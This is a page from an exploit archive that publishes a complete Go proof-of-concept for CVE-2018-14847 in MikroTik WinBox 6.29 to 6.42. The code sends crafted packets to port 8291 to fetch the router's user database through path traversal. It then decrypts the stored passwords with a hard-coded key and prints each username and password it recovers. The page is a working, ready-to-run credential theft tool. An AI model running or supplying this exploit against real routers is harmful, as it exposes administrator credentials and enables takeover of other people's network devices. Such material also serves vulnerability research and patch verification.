what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mikrotik WinBox 6.42 Credential Disclosure

Mikrotik WinBox 6.42 Credential Disclosure
Posted Aug 17, 2018
Authored by Maxim Yefimenko

Mikrotik WinBox version 6.42 suffers from a credential disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | facd664f6ae9c30c9f9f80e3755e975bbd10839dbf536c509f7c498a947844aa

Mikrotik WinBox 6.42 Credential Disclosure

Change Mirror Download
/*

# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition )
# Author: Maxim Yefimenko ( @slider )
# Date: 2018-08-06
# Sotware Link: https://mikrotik.com/download
# Vendor Page: https://www.mikrotik.com/
# Version: 6.29 - 6.42
# Tested on: Fedora 28 \ Debian 9 \ Windows 10 \ Android ( wherever it was possible to compile.. it's golang ^_^ )
# CVE: CVE-2018-14847
# References:
# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/
# ( BasuCert ) https://github.com/BasuCert/WinboxPoC
# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp
# and special thanks to Dmitriy_Area51

*/

package main

import (
"crypto/md5"
"fmt"
"net"
"os"
"strings"
"time"
)

var (
a = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
0x00, 0x00}

b = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00}

buf = make([]byte, 1024*8)
)

func checkErr(err error) {
if err != nil {
fmt.Println("Error:" + err.Error())
}
}

func decryptPassword(user []byte, passEnc []byte) string {
var passw []byte
hasher := md5.New()
hasher.Write(user)
hasher.Write([]byte("283i4jfkai3389"))
key := hasher.Sum(nil)

for i := 0; i < len(passEnc); i++ {
passw = append(passw, passEnc[i]^key[i%len(key)])
}

return string(ASCIIonly(passw))
}

func ASCIIonly(s []byte) []byte {
for i, c := range s {
if c < 32 || c > 126 {
return s[:i]
}
}
return s
}

func extractPass(buff []byte) (s []string) {
var (
usr []byte
pwd []byte
)

//searching for StartOfRecord
for i := 0; i < len(buff); i++ {

if i+2 >= len(buff) {
break
}

if (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) {
// fmt.Printf("Probably user record at offset 0x%.5x\n", i)

//some bytes ahead is enable/disable flag
i += int((buff[i+2] - 5))
if i >= len(buff) {
break
}

//searching for StartOfRecNumber
if i+3 >= len(buff) {
break
}

for !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) {
i++
if i+3 >= len(buff) {
break
}
}

i += 4
if i >= len(buff) {
break
}
// fmt.Printf("SORn: 0x%X\n", i)

// comment?
i += 18
if (i + 4) >= len(buff) {
break
}
if (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) {
if (i+1)+int(buff[i]) >= len(buff) {
break
}
i += int(buff[i])
} else {
i -= 18
}

//searching for StartOfPassword
if i+4 >= len(buff) {
break
}

for !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) {
i++
if i+4 >= len(buff) {
break
}
}
i += 5
if (i + 3) >= len(buff) {
break
}

if (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) {
pwd = buf[i-1+1 : int(buf[i-1])+i-1+1]
i += int(buff[i-1])
}

//searching for StartOfUsername
if i+3 >= len(buff) {
break
}
for !((buff[i] == 0x01) && (buff[i+3] == 0x21)) {
i++
if i+3 >= len(buff) {
break
}
}

i += 4
if i >= len(buff) {
break
}
if buff[i] != 0x00 {
if i+int(buff[i]) >= len(buff) {
break
}

usr = ASCIIonly(buff[i+1 : int(buff[i])+i+1])
i += int(buff[i])
}

decrypted := decryptPassword(usr, pwd)
//fmt.Printf(" --> %s\t%s\n", buff[i], decrypted)

if len(usr) != 0 {
s = append(s, strings.Join([]string{string(usr), string(decrypted)}, ":"))
}

}
}

return s
}

func main() {

if len(os.Args) < 2 {
fmt.Printf(" [ usage: %s 192.168.88.1\n\n", os.Args[0])
os.Exit(0)
}

conn, err := net.DialTimeout("tcp", os.Args[1]+":8291", time.Duration(3*time.Second))

if err != nil {
fmt.Println(err.Error())
return
}

defer conn.Close()

conn.Write(a)
reqLen, err := conn.Read(buf)
checkErr(err)
if reqLen < 38 {
panic("First packet is too small")
}

b[19] = buf[38]

conn.Write(b)
reqLen, err = conn.Read(buf)
checkErr(err)
db := buf[:reqLen]

s := extractPass(db)
for i, acc := range s {
data := strings.SplitN(acc, ":", 2)
fmt.Printf(" [%d] %s\t%s\n", i, data[0], data[1])
}
}

Login or Register to add favorites

File Archive:

March 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    13 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    31 Files
  • 8
    Mar 8th
    16 Files
  • 9
    Mar 9th
    13 Files
  • 10
    Mar 10th
    9 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    10 Files
  • 14
    Mar 14th
    6 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    22 Files
  • 17
    Mar 17th
    13 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    16 Files
  • 21
    Mar 21st
    13 Files
  • 22
    Mar 22nd
    5 Files
  • 23
    Mar 23rd
    6 Files
  • 24
    Mar 24th
    47 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close